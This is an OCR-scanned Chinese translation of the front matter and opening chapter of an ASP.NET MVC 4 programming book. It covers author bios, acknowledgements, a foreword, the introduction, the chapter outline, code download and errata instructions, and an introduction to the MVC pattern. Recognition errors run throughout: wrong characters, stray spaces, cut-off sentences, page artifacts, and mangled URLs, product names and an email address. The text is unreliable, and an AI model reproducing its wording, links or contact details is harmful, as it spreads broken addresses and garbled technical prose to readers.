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作者 简介 


Jon Galloway 是 Microsoft 公司 Windows Azure 在 ASPNET 平台 的 技术 专员 。 他 负责 
编写 MVC Music Store 教程 ， 并 帮助 组 织 mveConf 和 aspConf(ASPNET MVC 社区 的 目 
由 在 线 会 议 )， 并 在 世界 范围 的 会 议和 Web Camps 上 发 表演 讲 。 他 曾 在 多 家 Web 开发 公司 
供职 ， 从 随 气 着 描 的 创业 公司 到 大 型 企业 。 他 是 Herding Code 博客 (http://herdingcode.com) 
的 参与 者 之 一 , 他 的 博客 是 http://weblogs.asp.net/jgalloway,， twitter 账户 名 是 @jongalloway。 
他 和 他 的 太太 及 三 个 女儿 ， 一 起 住 在 San Diego， 他们 房子 周围 是 一 片 鳄 梨 树 。 


Phil Haack 从 事 GitHub 项 目 , 努力 使 Git 和 GitHub 对 Windows 上 的 开发 人 员 更 友好 ， 
更 容易 接受 ,在 加 入 GitHub 之 前 , Phil 是 ASPNET 团队 的 一 名 高 级 项 目 经 理 , 和 ASPNET 
团队 一 起 从 事 于 ASPNET MVC 和 NuGet 项 目 。 作 为 一 个 代码 “ 瘾 君子 ”Phil 喜欢 设计 软 
件 。 他 不 仅 喜 欢 编写 软件 ， 而 且 喜 欢 氛 写 关于 软件 和 软件 管理 的 博客 ， 他 的 博客 网 址 为 
http://haacked. comy 。 


Brad Wilson 是 Microsoft 公司 的 一 名 高 级 软件 开 友 工程 师 , 在 Azure 应 用 程序 平台 和 工 
具 (Web Platform and Tools) 团 队 从 事 于 ASPNET MVC 和 Web API 项 目 。 在 加 入 ASPNET 团 
队 之 前 ， 他 就 职 于 Microsoft 公司 的 模式 和 实践 (Patterns and Practices) 团 队 ， 同 时 也 在 CodePlex 
团队 中 工作 。 在 加 入 Microsoft 公司 之 前 的 20 年 里 ， 他 就 已 经 在 各 种 软件 公司 做 过 开发 人 员 、 
架构 师 、 团 队 组 长 和 CTO( 首 席 技术 官 )。 他 也 是 xUnitnet 开源 开发 测试 框架 的 合作 者 , 此 外 ， 
他 还 维护 了 一 些 主要 关于 ASPNET 主题 的 博客 ， 网 址 http://bradwilson.typepad.com/。 他 的 
Twitter 账户 名 是 @bradwilson。Brad 居住 在 风景 优美 的 华盛顿 州 雷 德 蒙 市 Redmond, WA)。 


K. Scott Allen 是 OdeToCode 有 限 责 任 公 司 的 创始 人 ， 同 时 也 是 一 名 软件 顾问 。Scott 
拥有 20 年 的 商业 软件 开发 经 验 ， 涉 足 技 术 广 泛 。 他 曾经 为 菲 入 式 设 备 、Windows 呆 面 、 
Web 和 移动 平台 开发 软件 产品 。 他 曾 为 财富 50 强 企 业 提 供 Web 服务 ， 为 创业 公司 提供 软 
件 文 持 。Scott 也 是 国际 会 议 的 发 言 人 ， 开 设 课程 指导 和 培训 世界 各 地 的 公司 。 


扩 林 编辑 向 介 


Eilon Lipton 在 2002 年 作为 一 名 开发 人 员 加 入 了 Microsoft 公司 的 ASPNET 团队 。 在 
ASPNET 团队 里 ， 他 既 做 过 数据 源 控件 ， 也 做 过 UpdatePanel 控件 的 本 地 化 工作 。 现 在 
ASPNET 团队 是 Azure Application Platform Team 的 一 部 分 ,在 那里 Eilon 是 ASPNET MVC、 
ASPNET Web API 和 Entity Framework 的 首席 开发 经 理 , 并 在 各 种 有 关 ASPNET 主题 的 全 
球 会 议 上 发 表演 讲 。 他 从 波士顿 大 学 毕业 ， 并 获得 数学 和 计算 机 科学 双 学 位 。 在 业余 时 间 ， 
Eilon 喜欢 在 他 的 车 库 里 制作 一 些 家 有 具 。 如 果 知 道 有 谁 需 要 一 个 3 英尺 左右 高 的 条 几 ， 可 以 
给 他 发 一 封 邮件 。 
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感谢 我 的 家 人 和 朋友 , 他 们 给 了 我 民 好 的 精神 状态 。 感谢 整个 ASPNET 团队 ， 目 2002 
年 以 来 ， 他 们 给 我 市 来 了 无 穷 的 工作 乐趣 ， 尤 其 是 Brad Wilson 和 Phil Haack， 他 们 俩 回 
答 了 我 成 千 上 万 个 突 发 育 想 的 问题 。 最 后 感谢 Philippians 4:4-9 时 刻 提 醒 我 哪 种 方式 是 正 
确 的 。 


一 一 Jon Galloway 


感谢 我 杀 爱 的 妻子 Akumi， 是 她 的 极 大 支持 才 使 得 该 书 得 以 完成 。 我 也 想 喊 出 对 我 的 
儿子 Cody 的 感谢 , 是 他 给 了 我 一 个 两 岁 孩 章 能 够 给 的 明智 建议 , 我 想 自 此 他 会 尴 欣 10 年 ， 
因为 在 我 对 他 的 感谢 中 用 了 一 个 与 时 代 不 符 的 词 “ 喊 出 ”。 感谢 我 的 女儿 Mia， 是 她 的 微笑 
点 亮 了 我 们 的 房间 。 

一 一 Phil Haack 
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我 很 高 兴 能 为 本 书写 序 ， 本 书 介 绍 了 最 新 发 布 的 ASPNET MVC， 并 由 一 文 优秀 的 作 
者 团队 编写 。 本 书 的 作者 都 是 我 的 好 友 ， 他 们 都 是 非常 优秀 的 技术 专家 。 

Phil Haack 是 ASPNET MVC 项 目 经 理 ， 他 从 一 开始 就 参与 该 项 目 。 因 为 他 有 植 根 于 
社区 和 开源 的 背景 ， 所 以 我 一 癌 认 为 他 不 仅 是 一 名 优秀 的 技术 人 员 ， 而 且 还 是 我 的 一 位 杀 
密 的 朋友 。 最 近 ，Phil 在 微软 还 从 事 一 个 新 的 .NET 包 管 理 器 NuGet 的 开发 。 

Brad Wilson 不 仅 是 我 最 爱 的 怀疑 论 者 ， 而 且 也 是 Microsoft 公司 ASPNET MVC 团队 
中 一 名 天 赋 异 夏 的 工程 师 。 从 动态 数据 到 数据 注解 ， 再 到 测试 等 ， 没 有 作为 程序 员 的 Brad 
干 不 了 的 。 他 从 事 过 许多 开源 项 目 ( 如 XUnit.NET)， 并 继续 推动 Microsoft 公司 内 外 部 人 员 
走向 光明 。 

Jon Galloway 是 一 个 专注 于 Azure 和 ASPNET 的 技术 传道 人 。 在 这 个 职位 ， 他 有 机 会 
接触 成 干 上 万 的 不 熟悉 ASPNET MVC 的 开发 人 员 。 他 负责 编写 了 MVC Music Store 教程 ， 
该 教程 帮助 成 千 上 万 的 开发 人 员 编 写 了 他 们 的 第 一 个 ASPNET MVC 应 用 程序 。Jon 也 帮 
助 组 织 mveConf 和 aspConf 一 一 ASPNE 开发 人 员 的 一 系列 目 由 在 线 会 议 。 他 与 各 种 ASPNET 
社区 的 互动 使 得 他 拥有 很 强 的 洞察 力 ， 知 道 开发 人 员 如 何 开 始 、 学 习 和 掌握 ASPNET 
MVC。 

最 后 也 是 相当 重要 的 是 ，K. Scott Allen 增强 了 团队 的 力量 ， 不 仅仅 是 因为 他 明智 地 决 
定 使 用 他 听 起 来 更 加 智能 的 中 间 名 ， 而 且 也 因为 他 带 来 了 一 个 世界 级 著名 培训 师 的 经 验 和 
智慧 。Scott Allen 是 Pluralsight 技术 团队 中 的 一 员 ， 曾 经 在 财富 50 强 公 司 从 事 网 站 和 创业 
咨询 方面 的 工作 。 他 善良 、 体 贴 、 值 得 尊重 ， 重 要 的 是 他 非常 透彻 地 了 解 目 己 。 

随 看 ASPNET Web 开发 平台 的 发 展 , 这 些 伙 计 团 结 在 一 块 儿 共 同 把 《ASPNET MVC 4 
高 级 编程 》 一 书 推 升 到 了 一 个 新 的 高 度 。 该 平台 有 目前 正在 由 全 球 数目 万 的 开发 人 员 使 用 。 

-个 充满 朝气 的 社区 文 持 该 平台 的 在 线 版 和 离线 版 ， 线 上 论坛 (www.asp.net) 平 均 每 天 都 有 
成 干 上 万 的 问答 。 

ASPNET 和 ASPNET MVC 4 的 应 用 面 很 广 ， 像 新 闻 网 站 、 网 上 零售 商店 以 及 我 们 最 
喜欢 的 社交 网 站 。 除 此 之 外 ， 或 许 我 们 当地 的 运动 队 、 读 书 俱 乐 部 或 博客 使 用 的 也 是 
ASPNET MVC 4。 

当 ASPNET MVC 刚刚 被 引入 时 ， 它 打破 了 很 多 领域 。 尽 管 使 用 的 是 旧 模 式 ， 但 是 这 
些 模式 对 于 现 有 的 ASPNET 社区 来 说 都 是 新 的 ; 它 在 生产 率 和 控制 、 功 能 和 灵活 性 之 间 求 
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得 了 微妙 平衡 。 今 天 ， 对 我 来 说 ，ASPNET MVC 4 代表 了 选择 一 一 语言 的 选择 、 框 架 的 选 
择 、 开 源 库 的 选择 、 模 式 的 选择 。 一 切 都 是 可 插 拔 的 。ASPNET MVC 4 是 我 们 对 环境 绝对 
控制 的 缩影 一 一 如 果 喜 欢 ， 就 使 用 ， 如 果 不 喜 欢 ， 就 改变 。 我 们 可 以 按照 自己 想 要 的 方式 
进行 单元 测试 ， 创 建 目 己 想 要 的 组 件 ， 使 用 目 己 选择 的 JavaScript 框架 。 

ASPNET MVC 4 为 我 们 带 来 了 ASPNET Web API, 一 个 用 于 构建 HTTP 服务 的 全 新 框 
架 ， 利 用 现代 Web 标准 和 移动 Web 应 用 文 持 更 新 默认 项 目 模板 ， 增 强 对 异步 方法 的 文 

同样 令 人 感到 振奋 的 是 ，ASPNET MVC 代码 现在 在 开源 许可 下 发 布 ， 接 受 开发 者 社 
区 的 贡献 。 您 编写 的 代码 很 可 能 会 与 下 一 版 本 ASPNET MVC 一 同 发 布 ! 我 建议 到 
www.asp.net/mvc 上 下 载 最 新 的 内 容 ， 以 及 最 新 的 示例 、 视 频 和 教程 。 

我 们 希望 本 书 讲解 的 内 容 能 够 是 您 精通 ASPNET MVC 4 历程 中 的 下 一 步 。 


-一 Scott Hanselman 


Microsoft Azure Web 团队 首席 社区 架构 师 


ll 
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对 一 名 ASPNET 开发 人 员 来 说 ， 这 是 一 个 伟大 的 时 刻 ! 

无 论 是 对 于 已 经 拥有 ASPNET 多 年 开发 经 验 的 开发 人 员 ， 还 是 对 于 刚刚 入 门 的 初学 
者 , 现在 都 是 深入 学 习 ASPNET MVC 4 的 绝 佳 时 机 。ASPNET MVC 从 一 开始 就 有 很 多 乐 
趣 ， 但 最 近 两 个 版 本 添加 了 许多 特性 ， 使 整个 开发 过 程 变 得 非常 愉悦 。 

ASPNET MVC 3 还 来 了 像 Razor 视图 引擎 这 样 的 新 特性 ， 与 NuGet 包 管 理 系统 和 
jQuery 内 置 整合 来 简化 Ajax 开发 。ASPNET MVC 4 继续 这 一 趋势 ， 又 添加 了 一 个 更 新 的 
可 视 化 设计 ， 移 动 Web 支持 ， 使 用 ASPNET Web API 的 HTTP 服务 ， 内 署 支 持 OAnuth 与 
流行 网 站 的 整合 等 。 这 样 我 们 就 可 以 快速 地 开始 使 用 全 功能 Web 应 用 程序 。 

这 也 不 是 简单 地 拖 放 短期 生产 率 。 这 一 切 都 建立 在 一 个 基于 模式 的 Web 框架 上 ， 当 需 
要 时 ， 这 个 框架 可 帮助 我 们 控制 应 用 程序 的 每 个 方面 。 

加 入 我 们 会 踏 上 一 个 有 趣 翔 实 的 ASPNETMVC 4 之 旅 ! 


本 书 读者 对 象 


本 书 由 浅 入 深 地 介绍 ASPNET MVC， 是 一 本 不 错 的 ASPNET MVC 教程 。 

如 果 刚 刚 接触 ASPNET MVC, 本 书 首先 会 帮助 学 习 MVC 概念 , 然后 演示 如 何在 应 用 
代码 示例 中 应 用 这 些 概念 。 本 书 作 者 已 经 指导 成 干 上 万 名 开发 人 员 开 始 学 习 ASPNET MVC， 
指导 怎样 安排 结构 思路 ， 以 便 快速 创建 ， 入 门 开发 。 

我 们 知道 我 们 的 许多 读者 都 熟悉 ASPNET Web Forms， 在 一 些 上 下 文中 ， 我 们 介绍 它 
们 之 间 的 异同 来 帮助 理解 它们 之 间 的 关系 。 事 实 上 ，ASPNET MVC 4 不 是 ASPNET Web 
Forms 的 替换 品 。 许 多 Web 开发 人 员 也 使 用 其 他 Web 框架 ， 比 如 Ruby on Rails、Django， 

- 些 PHP 框架 等 ， 这 些 框架 都 适用 于 MVC( 模 型 -视图 -控制 器 ，Model-View-ControllerD) 应 
用 模式 。 如 果 您 属于 这 类 开发 人 员 ， 或 者 只 是 好 奇 ， 本 书 就 适合 您 。 

我 们 也 付出 了 很 大 努力 ， 确 保本 书 能 够 为 拥有 ASPNET MVC 经 验 的 开发 人 员 提 供 一 
些 帮助 。 在 本 书 的 各 个 章节 ， 我 们 介绍 了 组 件 设计 原理 ， 以 及 如 何 最 好 地 使 用 它们 。 我 们 
添加 了 新 的 内 容 ， 包 括 新 添加 的 ASPNET Web API 章节 。 最 后 ，Phil Haack 新 编写 了 一 章 
来 展示 他 和 其 他 高 级 ASPNET MVC 开发 人 员 如 何 构 建 真 实 世 界 中 高 容量 的 ASPNET 
MVC 网 站 一 一 NuGet Gallery 网 站 案例 研究 。 
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本 书 组 织 结构 


本 书 共 16 章 ， 前 面 几 章 主 要 介绍 了 MVC 模式 ， 后 面 章节 主要 介绍 ASPNET MVC 是 
如 何 实现 MVC 模式 的 。 

第 1 章 “ 入 门 ” 帮 助 您 开始 进行 ASPNET MVC 4 开发 。 首 先 介 绍 了 ASPNET MVC 
的 概念 ， 然 后 解释 ASPNET MVC 4 如 何 顺应 前 两 个 发 布 版 本 。 最 后 ， 在 确保 正确 安装 软 
件 之 后 ， 帮 助 您 开始 创建 您 的 第 一 个 ASPNET MVC 4 应 用 程序 。 

第 2 章 “ 控 制 器 ”讲解 控制 器 和 操作 的 基础 内 容 。 您 开始 编写 一 些 基本 的 “hello world” 
示例 ， 然 后 创建 从 URL 中 提取 信息 并 在 屏幕 上 显示 的 应 用 程序 。 

第 3 章 “ 视 图 ”介绍 如 何 从 控制 副 操 作 中 使 用 视图 模板 控制 输出 的 可 视 化 表示 。 此 外 ， 
还 会 全 面 地 介绍 Razor 视图 引擎 ， 其 中 包括 帮助 组 织 和 维护 的 语法 和 特征 。 

第 4 章 “ 模 型 ”帮助 您 学 习 如 何 使 用 模型 在 控制 器 和 视图 之 间 传 递 信息 ， 以 及 如 何 使 
用 Entity Framework 的 Code First 开发 集成 数据 库 和 模型 。 

第 5 章 “ 表 单 和 HTML 辅助 方法 ”深入 介绍 编辑 情形 ， 解 释 ASPNET MVC 处 理 表单 
的 方式 。 您 将 从 本 章 中 学 习 到 如 何 使 用 HTML 辅助 方法 精简 视图 。 

第 6 章 “ 数 据 注 解 和 验证 ”介绍 如 何 使 用 特性 定义 模型 显示 、 编 辑 和 验证 的 规则 。 

第 7 章 “ 成 员 资格 、 授 权 和 安全 性 ”介绍 如 何 确保 ASPNET MVC 应 用 程序 安全 ， 并 
指出 常见 的 安全 陷阱 以 及 避 开 这 些 陷 阱 的 方法 。 此 外 ， 您 还 会 学 习 到 如 何 利用 ASPNET 
MVC 应 用 程序 中 的 ASPNET 成 员 资 格 和 授权 特性 来 控制 访问 权限 。 

第 8 章 “Ajax” 介 绍 ASPNET MVC 应 用 程序 中 的 Ajax 程序 ， 并 特别 强调 jQuery 和 
jQuery 插件 。 本 章 中 ， 您 将 会 学 习 到 如 何 使 用 ASPNET MVC 的 Ajax 辅助 方法 ， 以 及 如 何 
高 效 地 应 用 jQuery 验证 系统 。 

第 9 章 “ 路 由 ”深入 介绍 用 来 管理 如 何 把 URL 映射 到 控制 器 操作 的 路 由 机 制 。 

第 10 章 “NuGet” 介 绍 NuGet 包 管 理 系 统 。 通 过 本 章 内 容 ， 您 将 学 习 到 如 何 把 NuGet 
关联 到 ASPNET MVC， 如 何 安装 NuGet 以 及 如 何 使 用 NuGet 来 安装 、 更 新 和 创建 新 包 。 

第 11 章 “ASPNET Web API” 展 示 如 何 使 用 ASPNET Web API 创建 HITP 服务 。 

第 12 章 “ 依 赖 注入 ”介绍 依赖 注入 以 及 如 何在 应 用 程序 中 利用 依赖 注入 。 

第 13 章 “ 单 元 测试 ” 教 您 如 何在 ASPNET 应 用 程序 中 使 用 测试 驱动 开发 ， 并 提供 编 

第 14 章 “扩展 ASPNETMVC” 深 入 讲解 ASPNET MVC 中 的 扩展 点 ， 并 展示 如 何 扩 
展 MVC 框架 来 满足 您 的 具体 需求 。 

第 15 章 “ 高 级 主题 ”介绍 一 些 高 级 主题 ， 这 些 主题 在 阅读 本 书 前 14 章 之 前 讲解 可 能 
会 使 您 感到 吃力 。 本 章 涵 盖 Razor、 基 架 系 统 、 路 由 机 制 、 模 板 和 控制 器 的 一 些 复杂 应 用 。 

第 16 章 “ASPNET MVC 实战 : 构建 NuGet.org 网 站 ” 结合 学 习 的 每 个 知识 点 来 进行 
NuGet Gallery 网 站 (http://nuget.org) 案 例 研 究 。 在 这 里 , 您 会 学 习 到 ， 当 使 用 ASPNET MVC 


VIll 


二 < 二 
a 后 


构建 高 性 能 网 站 时 ，Phil Haack 和 其 他 高 级 ASPNET 工程 师 处 理 测试 、 成 员 资 格 、 部 署 和 
数据 迁移 的 方法 。 


使 用 本 书 的 条 件 


为 使 用 ASPNET MVC 4， 您 可 能 需要 安装 Visual Studio。 可 以 使 用 Microsoft Visual 
Studio Express 2012 的 Web 版 或 Visual Studio 2012 的 任何 付费 版 本 (如 Visual Studio 2012 
Professional)。Visual Studio 2012 中 包含 了 ASPNET MVC 4。 可 以 从 以 下 网 址 下 载 Visual 
Studio 和 Visual Studio Express: 

® Visual Studio: www.microsott.com/vstudio 

® Visual Studio Express: WWW.microsoft.com/express/ 

也 可 以 使 用 Visual Studio 2010 SP1 中 带 有 的 ASPNET MVC 4。ASPNET MVC 4 独立 
于 Visual Studio 2010 安装 ， 下 载 网 址 是 : 

® ASPNET MVC 4: www.asp.net/myvce 

第 1 章 详 细 介 绍 了 软件 需求 ， 并 演示 了 如 何在 开发 机 和 服务 妖 上 安装 。 


约定 


为 了 帮助 您 深入 学 习 内 容 ， 跟 上 本 书 进度 ， 我 们 在 各 章节 中 使 用 了 大 量 的 约定 。 
产品 小 组 的 话 


像 这 样 的 方 框 中 会 有 产品 小 组 的 一 些 忠 告 、 技 巧 、 琐 事 ， 或 者 其 他 一 些 与 周围 上 下 文 


直接 相关 的 信息 。 


注意 像 这 样 的 斜体 字 都 是 一 些 当 前 讨论 问题 的 忠告 、 提 示 和 技巧 。 


正文 中 文本 的 样式 约定 如 下 : 

e 我 们 展示 键盘 按键 像 这 样 的 形式 :Ctrl+A。 

e 我 们 展示 代码 的 方式 有 两 种 : 
对 于 大 部 分 没有 强调 内 容 的 代码 示例 ， 我 们 使 用 等 宽 字 体 类 型 。 
我 们 使 用 粗 体 来 强调 当前 上 下 文中 特别 重要 的 代码 , 或 者 展示 相对 于 前 一 代码 片段 
改变 的 部 分 。 
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产 代 码 


整 本 书 中 ， 您 会 注意 到 ， 当 建议 您 安装 NuGet 包 以 尝试 一 些 样 例 代码 时 ， 我 们 会 放置 
如 下 图 标 : 


Install-Package SomePackageName 


NuGet 是 Outercurve Foundation 为 .NET 和 Visual Studio 而 编写 的 包 管 理 器 ， 后 来 被 
Microsoft 公司 整合 到 了 ASPNET MVC 中 。 

我 们 不 必 再 在 Wrox 网 站 上 搜索 源 代码 示例 的 压缩 文件 了 ， 因 为 我 们 可 以 通过 使 用 
NuGet 轻松 地 把 这 些 文件 添加 到 ASPNET MVC 应 用 程序 中 。 我 们 认为 自 此 尝试 样 例 将 不 
再 痛 亩 ， 而 变 得 更 容易 、 更 方便 。 第 10 章 将 详细 介绍 NuGet 系统 。 

如 果 您 想 下 载 NuGet 包 , 以 便 在 以 后 不 能 上 网 时 使 用 , 这 些 包 也 可 以 从 www.wrox.com 
下 载 。 登 录 该 网 站 之 后 ， 只 需要 使 用 Search 框 或 标题 列表 中 的 一 个 找到 书 的 标题 ， 单 击 本 
书 详细 页 面 上 的 Download Code 链接 ， 即 可 下 载 本 书 涉及 的 所 有 源 代 人 码 。 男 外 ， 也 可 从 
http://www.tup.com.cmv/downpage 下 载 本 书 的 源 代码 。 


由 于 许多 图 书 的 标题 都 很 类 似 ， 所 以 按 ISBN 搜索 是 最 简单 的 ; 本 书 英文 
版 的 ISBN 是 978-1-118-34846-8。 


在 下 载 了 代码 后 ， 只 需要 用 目 己 喜欢 的 解压 缩 软 件 对 它们 进行 解压 缩 即 可 。 另 外 ， 也 
可 以 进入 http://www.wrox.conydynamic/books/download.aspx 上 的 Wrox 代码 下 载 页 面 ， 查 
看 本 书 和 其 他 Wrox 图 书 的 源 代 码 。 


勘误 表 


尽管 我 们 已 经 尽 了 各 种 努力 来 保证 文章 或 代码 中 不 出 现 错误 ， 但 是 错误 总 是 难免 的 ， 
如 果 您 在 本 书 中 找到 了 错误 ， 例 如 拼写 错误 或 代码 错误 ， 请 告诉 我 们 ， 我 们 将 非常 感激 。 
通过 勘误 表 ， 可 以 让 其 他 读者 避免 受挫 ， 当 然 ， 这 还 有 助 于 提供 更 高 质量 的 信息 。 

请 给 wkservice(@vip.163.com 发 电子 邮件 , 我 们 就 会 检查 您 的 信息 ， 如 果 是 正确 的 , 我 
们 将 在 本 书 的 后 续 版 本 中 采用 。 

要 在 网 站 上 找到 本 书 的 勘误 表 ， 可 以 登录 http:/Wwww.wrox.com， 通 过 Search 框 或 书 名 
列表 查找 本 书 ， 然 后 在 本 书 的 详细 页 面 上 ， 单 击 Errata 链接 。 在 这 个 页 面 上 可 以 查看 到 Wrox 
编辑 已 提交 和 粘贴 的 所 有 勘误 项 。 完 整 的 图 书 列表 还 包括 每 本 书 的 勘误 表 ， 网 址 是 


WWW.WIOX.com/misc-pages/booklist.shtml。 


Dll} 


p2p.wrox.com 


要 与 作者 和 同行 讨论 , 请 加 入 p2p.wrox.com 上 的 P2P 论坛 。 这 个 论坛 是 一 个 基于 Web 
的 系统 ， 便 于 您 张贴 与 Wrox 图 书 相 关 的 消 明 和 相关 技术 ， 与 其 他 读者 和 技术 用 户 交 流 心 
得 。 该 论坛 提供 了 订阅 功能 , 当 论 坛 上 有 新 的 消息 时 , 它 可 以 给 您 传送 感 兴 趣 的 论题 Wrox 
作者 、 编 辑 和 其 他 业界 专家 和 读者 都 会 到 这 个 论坛 上 探讨 问题 。 

在 http://p2p.wrox.com 上 ， 有 许多 不 同 的 论坛 ， 它 们 不 仅 有 助 于 阅读 本 书 ， 还 有 助 于 
开发 目 己 的 应 用 程序 。 要 加 入 论坛 ， 可 以 遵循 下 面 的 步骤 : 

(1) 进入 p2p.wrox.com， 单 击 Register 链接 。 

(2) 阅读 使 用 协议 ， 并 单 击 Agree 按钮 。 

(3) 填写 加 入 该 论坛 历 需 要 的 信息 和 目 己 希望 提供 的 其 他 信息 ， 单 击 Submit 按钮 。 

(4) 您 会 收 到 一 封 电子 邮件 ， 其 中 的 信息 描述 了 如 何 验证 账户 ， 完 成 加 入 过 程 。 


注意 ”不 加 入 P2P 也 可 以 阅读 论坛 上 的 消息 ， 但 要 张贴 自己 的 消息 ， 就 
必须 加 入 该 论坛 。 


加 入 论坛 后 ， 束 可 以 张贴 新 消 县 ， 啊 应 其 他 用 户 张贴 的 消息 。 可 以 随时 在 Web 上 阅读 
消息 。 如 果 要 让 该 网 站 给 目 己 发 送 特定 论坛 中 的 消息 ， 可 以 单 击 论坛 列表 中 该 论坛 名 劳 边 
的 Subscribe to this Forum 图 标 。 

关于 使 用 Wrox P2P 的 更 多 信息 ,可 阅读 P2P FAQ, 了 解 论坛 软件 的 工作 情况 以 及 P2P 
和 Wrox 图 书 的 许多 向 见 问题 。 要 阅读 FAQ， 可 以 在 任意 P2P 页 而 上 单 击 FAQ 链接 。 
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本 章 主 要 内 容 

e 理解 ASPNET MVC 

e ASPNET MVC 4 概述 

e ASPNET MVC 4 应 用 程序 的 创建 方法 
e ASPNET MVC 4 应 用 程序 的 结构 


EE 章 将 简明 扼要 地 介绍 ASPNET MVC， 解 释 ASPNET MVC 4 如 何 适 应 ASPNET 
MVC 的 发 布 历程 ， 总 结 ASPNET MVC 4 的 新 特性 ， 并 介绍 如 何 配 置 ASPNET MVC 4 应 
用 程序 的 开发 环境 。 

本 书 是 关于 Web 框架 第 4 版 的 专业 系列 书籍 之 一 ， 因 此 对 Web 框架 只 做 简要 介绍 。 
本 书 不 会 浪费 笔墨 来 说 服 读者 学 习 ASPNET MVC， 因 为 我 们 认为 您 购买 本 书 的 目的 就 是 
为 了 学 习 ASPNET MVC。 证 明 软 件 框 架 和 模式 价值 最 好 的 方法 就 是 展示 它们 在 实际 场景 
中 的 应 用 ， 因 此 ， 这 方面 会 重点 予以 介绍 。 


1.1 ASPNET MVC 简介 


ASPNET MVC 是 一 种 构建 Web 应 用 程序 的 框架 , 它 将 一 般 的 MVC(Model-View-Controller) 
模式 应 用 于 ASPNET 框架 。 下 面 首先 介绍 ASPNET MVC 和 ASPNET 框架 之 间 的 关系 。 


1.1.1 ASPNET MVC 如 何 适 应 ASPNET 


在 2002 年 ASP.NET 1.0 首次 发 布 时 ， 人 们 很 容易 将 ASPNET 和 Web Forms 看 成 同一 
事物 。 尽 管 当时 ASPNET 已 经 支持 两 层 抽象 ， 具 体 如 下 : 
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e System.Web.UI: Web Forms 层 ， 由 服务 器 控件 和 ViewsState 等 组 成 。 
e System.Web: 管道 程序 ， 提 供 基 本 的 Web 堆栈 ， 其 中 包括 组 件 模块 、 处 理 程 序 和 
HTTP 堆栈 等 。 

应 用 ASPNET 开发 的 主流 方法 赛 括 了 整个 Web Forms 堆栈 一 一 利用 拖 放 服务 器 控件 ， 
有 用 的 状态 (semi-magical statefulness) 来 处 理 后 台 的 复杂 事务 (但 这 样 具 有 经 常 混 消 页 和 面 生 
命 周期 ， 生 成 不 太 理想 的 HIML 页 面 等 缺点 )。 

然而 ， 总 是 会 有 发 生 下 面 所 述 情况 的 可 能 性 ， 即 通过 使 用 处 理 器 、 组 件 模块 和 其 他 手 
写 代 码 来 直接 啊 应 HTTP 请 求 ， 按 照 想 要 的 方式 构建 Web 框架 ,设计 出 精彩 的 HTML 页 
面 。 虽 然 可 以 这 样 做 ， 但 实现 起 来 非常 困难 ， 这 并 不 是 因为 在 广泛 的 计算 机 科学 世界 里 缺 
乏 设 计 模 式 ， 而 是 因为 缺乏 一 种 内 置 的 模式 文 持 这 样 的 实现 。 在 2007 年 ASPNET MVC 发 
布 之 时 ，MVC 模式 已 成 为 构建 Web 框架 最 流行 的 方式 之 一 。 


1.1.2 ”MYVC 模式 简介 


MVC 成 为 计算 机 科学 领域 重要 的 构建 模式 已 有 多 年 历史 。1979 年 ， 它 最 初 被 命名 为 
事物 -模型 -视图 -编辑 器 (Thine-Model-View-Editor)， 后 来 简化 成 了 模型 -视图 -控制 器 


据 访 问 逻 辑 )，MVC 是 一 种 强大 而 简洁 的 方式 ， 尤 其 是 应 用 在 Web 应 用 程序 中 。 虽 然 关 注 
点 的 显 式 分 离 在 一 定 程 度 上 增加 了 应 用 程序 设计 的 复杂 性 ， 但 总 体 来 说 ，MVC 珊 来 的 益 
处 要 超过 它 所 帝 来 的 刺 疹 。 目 从 引入 以 来 ，MVC 已 经 在 数 十 种 框架 中 得 到 应 用 ， 在 Java 
和 C++ 语言 中 ， 在 Mac 和 Windows 操作 系统 中 以 及 在 很 多 架构 内 部 都 用 到 了 MVC。 

MVC 将 应 用 程序 的 用 户 界面 (User Interface，UD) 分 为 三 个 主要 部 分 : 

e 模型 : 一 组 类 ， 描 述 了 要 处 理 的 数据 以 及 修改 和 操作 数据 的 业务 规则 。 

e 视图 : 定义 应 用 程序 用 户 界 面 的 显示 方式 。 

e 控制 器 : 一 组 类 ， 用 于 人 处理 来 目 用 户 、 整 个 应 用 程序 流 以 及 特定 应 用 程序 逻辑 的 

通信 。 


MVC 作为 用 户 界 面 模式 

注意 这 里 的 MVC 指 的 是 一 种 用 户 界面 模式 。MVC 模式 是 处 理 用 户 交 互 的 一 种 解决 
方案 ， 它 并 不 处 理应 用 程序 关注 的 其 他 问题 ， 如 数据 访问 ， 服 务 交互 等 。MVC 模式 很 有 
用 , 但 它 与 其 他 设计 模式 一 样 需 要 应 用 到 程序 的 开发 过 程 中 , 记 住 这 一 点 对 学 习 MVC 很 
有 帮助 。 
1.1.3 ”MVC 在 Web 框架 中 的 应 用 


MVC 模式 经 常 应 用 于 Web 程序 设计 中 。 在 ASPNET MVC 中 ，MVC 三 个 主要 部 分 的 
e 模型 : 模型 是 描述 程序 设计 人 员 感 兴趣 问题 域 的 一 些 类 ， 这 些 类 通常 封装 存储 在 数 
据 库 中 的 数据 ， 以 及 操作 这 些 数据 和 执行 特定 域 业务 逻辑 的 代码 。 在 ASP.NET MVC 


第 1 章 入 门 


中 ， 模 型 就 像 是 一 个 使 用 了 某 种 工具 的 数据 访问 层 (Data Access Layer)， 这 种 工具 
包括 实体 框架 (Entity Framework) 或 者 与 包含 特定 域 逻 辑 的 目 定 义 代码 组 合 在 一 起 
的 NHibernate 。 

e 视图 : 一 个 动态 生成 HTML 页 面 的 模板 ， 这 一 内 容 将 在 第 3 章 详细 前 述 。 

e 控制 器 : 一 个 协调 视图 和 模型 之 间 关 系 的 特殊 类 。 它 啊 应 用 户 输 入 ， 与 模型 进行 对 
话 ， 并 决定 呈现 哪个 视图 (如 果 有 的 话 )。 在 ASP.NET MVC 中 ， 这 个 类 文件 通常 以 
后 级 名 Controller 表示 。 


注意 MVC 是 一 种 高 级 架构 模式 ， 它 的 使 用 取决 于 有 具体 应 用 环境 ， 记 住 这 一 
点 是 很 重要 的 。ASPNET MVC 的 上 下 文 是 问题 域 (一 个 无 状态 的 Web 环境 ) 和 
宿主 系统 (ASPNET)。 

我 时 常 与 一 些 具 有 MVC 开发 经 验 的 人 员 聊 天 ,他 们 在 互 不 相同 的 环境 下 
使 用 MVC 模式 ， 他 们 感到 困惑 、 肖 表 ， 主 要 是 因为 他 们 认为 ASPNET MVC 
的 工作 原理 与 15 年 前 在 他 们 的 大 型 机 账户 处 理 系统 中 的 原理 是 一 样 的 。 事 实 
并 非 如 此 ， 这 是 一 件 好 事 ，ASPNET MVC 注重 应 用 MVC 模式 来 提供 一 个 运 
